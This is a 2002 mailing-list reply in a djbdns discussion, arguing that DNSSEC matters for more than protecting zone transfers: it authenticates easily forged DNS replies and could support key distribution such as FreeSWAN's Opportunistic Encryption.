On Wed, Nov 20, 2002 at 10:14:50AM -0700, Vincent Danen wrote: > > From where I sit, the only thing djbdns > doesn't do is DNSSEC and DDNS, neither of which are useful to me. > DNSSEC can be avoided by using tcprules to protect access to zone > transfers.
Vincent, I am sure you are aware of this, but for the benefit of those following along, DNSSEC is about _a_lot_ more than just securing who can zone transfer from you. It the infrastructure needed to make DNS a PKI. It also adds integrity to a system that lacks any right now. UDP packets are trivial to forge (much more so trivial than TCP packets), so it is relatively easy to cause all kinds of security problems by means of forging DNS replies. People rely on the accuracy of DNS replies all the time (much more than they should). DNSSEC adds authenticity to DNS replies so that answers can be relied on to the extent that people (blindly) rely on them today. On the PKI front, have you seen FreeSWAN's Opportunisitc Encryption proposal? It uses the DNS to distribute and authenticate encryption and authorization keys. This can only be done with any reliability with DNSSEC. b. -- Brian J. Murrell
msg81818/pgp00000.pgp
Description: PGP signature
